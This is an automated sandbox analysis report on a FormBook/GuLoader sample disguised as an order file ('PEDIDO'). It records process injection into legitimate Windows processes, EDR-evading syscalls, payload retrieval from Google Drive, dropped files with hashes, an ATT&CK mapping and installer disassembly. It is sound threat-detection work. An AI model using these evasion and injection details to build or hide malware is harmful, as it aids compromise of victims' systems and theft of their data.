        Source: C:\Users\user\Desktop\PEDIDO-144848.exeThread register set: target process: 6432Jump to behavior
        Source: C:\Windows\SysWOW64\SecEdit.exeThread register set: target process: 6432Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeProcess created: C:\Users\user\Desktop\PEDIDO-144848.exe "C:\Users\user\Desktop\PEDIDO-144848.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PEDIDO-144848.exeCode function: 0_2_00405DC2 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405DC2

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.117101970998.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.117102256673.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.115570845480.0000000036930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		12
        Masquerading        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		311
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials13
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
        Obfuscated Files or Information        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528317 Sample: PEDIDO-144848.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 96 28 drive.usercontent.google.com 2->28 30 drive.google.com 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected FormBook 2->42 44 2 other signatures 2->44 10 PEDIDO-144848.exe 1 511 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 52 Switches to a custom stack to bypass stack traces 10->52 14 PEDIDO-144848.exe 6 10->14         started        signatures6 process7 dnsIp8 32 drive.google.com 142.250.80.46, 443, 49748 GOOGLEUS United States 14->32 34 drive.usercontent.google.com 142.251.40.97, 443, 49749 GOOGLEUS United States 14->34 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Queues an APC in another process (thread injection) 14->58 60 Found direct / indirect Syscall (likely to bypass EDR) 14->60 18 RAVCpl64.exe 14->18 injected signatures9 process10 signatures11 36 Found direct / indirect Syscall (likely to bypass EDR) 18->36 21 SecEdit.exe 18->21         started        process12 signatures13 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Switches to a custom stack to bypass stack traces 21->50 24 explorer.exe 32 1 21->24 injected process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        PEDIDO-144848.exe24%ReversingLabsWin32.Trojan.NsisInject
        PEDIDO-144848.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.250.80.46
        		truefalse
          		unknown
          drive.usercontent.google.com
          		142.251.40.97
          		truefalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
              		unknown
              https://drive.usercontent.google.com/hPEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://www.google.comPEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.quovadis.bm0PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://drive.usercontent.google.com/PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://nsis.sf.net/NSIS_ErrorPEDIDO-144848.exe, PEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                        		unknown
                        https://apis.google.comPEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorPEDIDO-144848.exe, 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000000.00000000.113760696755.0000000000409000.00000008.00000001.01000000.00000003.sdmp, PEDIDO-144848.exe, 00000002.00000000.115002326935.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                            		unknown
                            https://ocsp.quovadisoffshore.com0PEDIDO-144848.exe, 00000002.00000003.115460308522.0000000006B88000.00000004.00000020.00020000.00000000.sdmp, PEDIDO-144848.exe, 00000002.00000003.115119605785.0000000006B8E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.gopher.ftp://ftp.PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                		unknown
                                https://drive.google.com/PEDIDO-144848.exe, 00000002.00000003.115460520041.0000000006B3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214PEDIDO-144848.exe, 00000002.00000001.115003799007.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.80.46
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    142.251.40.97
                                    		drive.usercontent.google.comUnited States
                                    		15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528317
                                    Start date and time:2024-10-07 19:21:34 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 17m 51s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:2
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PEDIDO-144848.exe
                                    Detection:MAL
                                    Classification:mal96.troj.evad.winEXE@5/7@2/2
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HCA Information:
                                    • Successful, ratio: 86%
                                    • Number of executed functions: 61
                                    • Number of non-executed functions: 307
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: PEDIDO-144848.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    13:27:15API Interceptor11664548x Sleep call for process: SecEdit.exe modified
                                    13:29:39API Interceptor164x Sleep call for process: explorer.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    down.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    jre-6-windows-i586.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    0urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97
                                    file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                    • 142.250.80.46
                                    • 142.251.40.97

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dlltransferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      transferencia.exeGet hashmaliciousGuLoaderBrowse
                                        KZ710-0038.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                          KZ710-0038.exeGet hashmaliciousGuLoaderBrowse
                                            dc#U10d8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              dc#U10d8.exeGet hashmaliciousGuLoaderBrowse
                                                4455.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  4455.exeGet hashmaliciousGuLoaderBrowse
                                                    #U0421#U041c#U0413#U0421 #U0412#U0430#U0433#U043e#U043d #U211628870905.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                      Created / dropped Files

                                                      C:\Program Files (x86)\Fljtenists.ini

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):34
                                                      Entropy (8bit):4.35937791471612
                                                      Encrypted:false
                                                      SSDEEP:3:oMXADiGWkon:xnGWn
                                                      MD5:5BAD417385FA63549574090876DC680D
                                                      SHA1:84E00066DC079E657BE9AF39E2C9E4EC42F5E527
                                                      SHA-256:8B8CCA2780BD72F608E87BAEC979BBB17706AEFEB8D9F603E53AE144ECFAB71D
                                                      SHA-512:EA709BAB31CFAAB4979617C4D1DFF414387F6988BE9F67E70BF7F941A9E7EA4C36CF320CE2518AE0DD9171DF5C46BE85D86D3F6031059A3CB3E79FD58E3F14E2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:[Omniregent]..promovable=bugspyt..

                                                      C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):5.7711167426271945
                                                      Encrypted:false
                                                      SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                                      MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                                      SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                                      SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                                      SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: transferencia.exe, Detection: malicious, Browse
                                                      • Filename: transferencia.exe, Detection: malicious, Browse
                                                      • Filename: KZ710-0038.exe, Detection: malicious, Browse
                                                      • Filename: KZ710-0038.exe, Detection: malicious, Browse
                                                      • Filename: dc#U10d8.exe, Detection: malicious, Browse
                                                      • Filename: dc#U10d8.exe, Detection: malicious, Browse
                                                      • Filename: 4455.exe, Detection: malicious, Browse
                                                      • Filename: 4455.exe, Detection: malicious, Browse
                                                      • Filename: #U0421#U041c#U0413#U0421 #U0412#U0430#U0433#U043e#U043d #U211628870905.exe, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\slavelivets\Projektrapporten.Win

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):195963
                                                      Entropy (8bit):7.548314521933
                                                      Encrypted:false
                                                      SSDEEP:3072:h53xtSRcBwB5S7jyqo+7tKe4C834+CLO1viUBzxQKkfqHk+OMiZXBUGDDoqIn6:D+Uw7S6J+bY48aUBzvkf+k+OMQ6Ggn6
                                                      MD5:9EB63435670F759E6741E3DB91C9389A
                                                      SHA1:4CF1E7A48E3B14D79689AB60927A0BC5485ED060
                                                      SHA-256:AB12F771F3E857807A5264382E602D6C336A3E9E657C0AAECB0A812E6DCEA386
                                                      SHA-512:E056F5D53BBDE0B2358A7B200922D8F31EC216605626E797C532AC4CEA99AEA4FFDC36CCA3EBBB5988DF19CA2C5F97ABA8398CE94A98C92D69BDBA2E85590FD6
                                                      Malicious:false
                                                      Preview:............?.aaaaa.***.[.???........................tt............jjj........44............ZZZ.\.........,...........~.WWWWWW.........0.....dd..4......l.......111......Z....)....................zzz..YY...v...............NN.......................K.^........XXX....E.>>..9999...;......PP....rrr................O..H.............................LLLL....!............... .......................C.W.........................##......i....O......:::................#..~~.........\\........@@@.......i.MM........ttt.......|.....WWWWWW.....ttttt.0..........%.....[.......P...................... .........,..%%%%%%%%%..............www..e.rr...............................................J.........^.............{{..[......mmmmm..............................D.......88.....2..................1.....6...............F.............6... .."....................=......~~~........................ ..4.....................w....z..nnn....FF..aaaa...........-...............jjj..........D......n.......T...............

                                                      C:\Users\user\slavelivets\Skrne.Dam

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):440396
                                                      Entropy (8bit):2.656467684169908
                                                      Encrypted:false
                                                      SSDEEP:1536:3eBqsoDZCblQiHdWRUmxbNn6cldzln5cGe+q8bBvzO4suXyRdPeF3U5tmq3QAZYU:3Ex7W5zl2BVUIT59OliZ/4P0FuxFe
                                                      MD5:8AF191D07992E5026F3D1C084B0B9674
                                                      SHA1:8AA1C0903397F405A9EE75B48679076498BD4B33
                                                      SHA-256:E7C1DDF4BA6441AD36773538A479D1967D0BC91FA62E8E28E0B56AFFA86EDFB3
                                                      SHA-512:E4DCAB5BAF44044CF13DBDE98F6AB26F9C5DE70B7D0F2A71D3C3F2C0C16645A671A566577C5C935E6BF02B5E1BC18563CD4CD96D39AF168FD25AF119E2068661
                                                      Malicious:false
                                                      Preview:005D00680000AF0000E9E9001010000044440000CECECE007474000090909090900000000000FDFD000000000000350064640000E80093939300C4C40000EB0075000046000100000000E8E8E800850000CA0079790000FD00005D0000F1000000B3B300000059003200008000005B5B00005500F000F3F300A20071001C000000002E00003D008D8D8D8D8D000000A0A0A00000EEEE000000000000AC00292900A600000000C20027272700000000008A8A8A8A8A000000989898989898005454540000000000DBDBDB00009B9B9B9B000000F900ABABABABAB0000000000006300000000CBCBCB003F00FA00000000030000EAEAEA000000DEDE0000480046464600B6B60000000061616100B8008E0000008E8E0000003300FAFAFAFA007400CA002300000900000039000000000000D50000A0A00000000000070700E1E1E1E10000D3D3D3D300970072727200BFBF0000A500DB00A6A6A6A600CDCD000000030300C300EE00006A00B9B9B9B9B9B9B9003A00BCBC00FF001E1E004D4D4D4D4D4D0000BBBBBBBBBB0000525252000000A1005B008800310000CD000000000000000505000053000000007200C1000A0000A30000808000E4005B0000000000000000A2000000A1A1A100004747474700C50000005959590000006767670000009800CF000053530082828282000000000084

                                                      C:\Users\user\slavelivets\alsmekill.sta

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):339393
                                                      Entropy (8bit):1.2543469977620876
                                                      Encrypted:false
                                                      SSDEEP:1536:JwpZQcXbJ+mf8ME8s+dg5Z90uGaXF9Pl7:W4cX8ncmxhGm
                                                      MD5:F6A8488B1B62B7AC3B0979C8FBEABB30
                                                      SHA1:9725896EBC26CCB2CB9060640B9E0D4A0618916F
                                                      SHA-256:34DC9B70D0CE5223A531E499611F1208F3AE85AAEF9973FC27E89190568F8EE2
                                                      SHA-512:88A719685D0972290632C6B5A665184E79A98BE22B76AF28F18056F2E7A721A0B2D3B4A8815BCE562426643E69F998F9E45F3CA62B3288EAAFB71FE89A23AD20
                                                      Malicious:false
                                                      Preview:..............................................o....D....................l.......k...................................._...2...........;..........................................0............................e......_....................}.......................,....4...................n.............T................j...z..........u.....#...................h............].............................................................................................................1......G...h.......g...3..(........................................................H......)...........o...................4.............^..................."....................$....................E..............................................................|..........3.............1...........................S....................x..........................................................................................................................................................=..........................|....

                                                      C:\Users\user\slavelivets\boat.ast

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):456047
                                                      Entropy (8bit):1.2479728238915362
                                                      Encrypted:false
                                                      SSDEEP:768:WqBSYr/TzktUI9ql+6iD8iDu43pfrmQ+PHlyjwkZY51UG90JdfSDUsby4/FApmbO:I3TS9ymKhysrQEkRbwvL3xcbNyFN2Mv
                                                      MD5:9911B32FE219697A738F39AE5766B512
                                                      SHA1:DA67EBB043C778DEEA874E1C746483A2B65E533C
                                                      SHA-256:1D3D52ECB41F725DC23080ACB1ACDFEDF29BB5F167DCB75F89AF837888421880
                                                      SHA-512:FBF703CD56434BB14C6A1A34878F094BE183D9F638D0F34074F7EE4C9D12DB70A833679B496FCB1E4C6050C418A906221149AAC70035BCDA3C01D4272C0FE3E8
                                                      Malicious:false
                                                      Preview:.................................................z.................m.......L.......<.............................................................._.....y....._.........x.................................................................>............Q...........:e........................................................[.-.:....................................................A.....................................................................G................................+..............................z..........................................]...........................................................................................T.....&.}........G..............c...u.....................5......B....................................................................l................H..........................H.......................|...........................m.............................................:...........(...............8..............................................g.....

                                                      C:\Users\user\slavelivets\rupis.txt

                                                      Download File
                                                      Process:C:\Users\user\Desktop\PEDIDO-144848.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):276
                                                      Entropy (8bit):4.348758704403097
                                                      Encrypted:false
                                                      SSDEEP:6:4s/IdpH+oqGSUkJOlUjvMzJ7HxXEp6JN+qIN2CGZgw9n7FmNIb+:4skpesSUAOlSsJ7BEpg+H2XWwTmCq
                                                      MD5:668A01D3AF55A42FBFDBB1E9DD730B59
                                                      SHA1:E0949D489A15516B3CD09F1043543C38E3688F1A
                                                      SHA-256:6A7FEEBFE1F4330E611E6E1B3804619D329A9D3ABD3A3ECBD9D441F884E9999D
                                                      SHA-512:CF3F03583667362ADCEA4DEB094513B84D3E275EBCC42A993F9293B7374618A1BA060D4C4BAE446C02B329DDE2A4579C152F54A1F7537A0F83A3E88406509459
                                                      Malicious:false
                                                      Preview:vulcanizable zoanthidae raalam osullivan,phantasmic oxyluminescence fluidness pickin raadelig.muslimer broder encyclopaedically bessarabian bvt.skyggespillene shellfishes urmi fume panocha imago,troskabseder cypriotes thalassian,udvandringskontorers telfonmontrens bugtalende.

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.301140250836449
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:PEDIDO-144848.exe
                                                      File size:614'672 bytes
                                                      MD5:0d9f261233df472092fbfbb1e982bbe7
                                                      SHA1:003feaf99830b2aac6213ede7d72b148b709da0b
                                                      SHA256:57e01b9f47d3220585bdef71852add983d96d959c08b961b1f2795ef07d78160
                                                      SHA512:4b5e0e9b5412c369cbdc3bf17c3daf394ae424e2888c9ccc9a752118738909710e8ef770a9afbe2c4bb8b92d501b39e132a7ef696a17968f0deac31e0530bf8e
                                                      SSDEEP:12288:H22tNcD43mIga1oZVSnPqls/sFVk906OLRHk:H22tGD43XrfPwzH6O9Hk
                                                      TLSH:80D4F143764598E0F8A21D7158BB4A6149BF5F3BBA80282FB7D8730614F214B4B3E7D6
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L.....MX.................`....9....

                                                      File Icon

                                                      Icon Hash:8b1985c04404416d

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x403180
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x584DCA1F [Sun Dec 11 21:50:23 2016 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de

                                                      Authenticode Signature

                                                      Signature Valid:false
                                                      Signature Issuer:CN="Kovil Caisson Bhmere ", E=Reobjectivize@Excreation.Cy, L=Horsarrieu, S=Nouvelle-Aquitaine, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 31/05/2024 12:44:13 31/05/2027 12:44:13
                                                      Subject Chain
                                                      • CN="Kovil Caisson Bhmere ", E=Reobjectivize@Excreation.Cy, L=Horsarrieu, S=Nouvelle-Aquitaine, C=FR
                                                      Version:3
                                                      Thumbprint MD5:07E47CC1F9EBBA51D31EFE54E903163E
                                                      Thumbprint SHA-1:72A19948CAB480E03E59FFD2E399BAF955540C4E
                                                      Thumbprint SHA-256:6965A8E64D5D22CEB7B775620F7EDBBC5F29D9B2FB741502EFD803DFAF603DE0
                                                      Serial:6E220BC67210C42F04C77D51B104154475E9EE96

                                                      Entrypoint Preview

                                                      Instruction
                                                      sub esp, 00000184h
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      xor ebx, ebx
                                                      push 00008001h
                                                      mov dword ptr [esp+18h], ebx
                                                      mov dword ptr [esp+10h], 00409198h
                                                      mov dword ptr [esp+20h], ebx
                                                      mov byte ptr [esp+14h], 00000020h
                                                      call dword ptr [004070A8h]
                                                      call dword ptr [004070A4h]
                                                      cmp ax, 00000006h
                                                      je 00007FC2A119FF43h
                                                      push ebx
                                                      call 00007FC2A11A2EB1h
                                                      cmp eax, ebx
                                                      je 00007FC2A119FF39h
                                                      push 00000C00h
                                                      call eax
                                                      mov esi, 00407298h
                                                      push esi
                                                      call 00007FC2A11A2E2Dh
                                                      push esi
                                                      call dword ptr [004070A0h]
                                                      lea esi, dword ptr [esi+eax+01h]
                                                      cmp byte ptr [esi], bl
                                                      jne 00007FC2A119FF1Dh
                                                      push ebp
                                                      push 00000009h
                                                      call 00007FC2A11A2E84h
                                                      push 00000007h
                                                      call 00007FC2A11A2E7Dh
                                                      mov dword ptr [007A1F44h], eax
                                                      call dword ptr [00407044h]
                                                      push ebx
                                                      call dword ptr [00407288h]
                                                      mov dword ptr [007A1FF8h], eax
                                                      push ebx
                                                      lea eax, dword ptr [esp+38h]
                                                      push 00000160h
                                                      push eax
                                                      push ebx
                                                      push 0079D500h
                                                      call dword ptr [00407174h]
                                                      push 00409188h
                                                      push 007A1740h
                                                      call 00007FC2A11A2AA7h
                                                      call dword ptr [0040709Ch]
                                                      mov ebp, 007A8000h
                                                      push eax
                                                      push ebp
                                                      call 00007FC2A11A2A95h
                                                      push ebx
                                                      call dword ptr [00407154h]

                                                      Rich Headers

                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
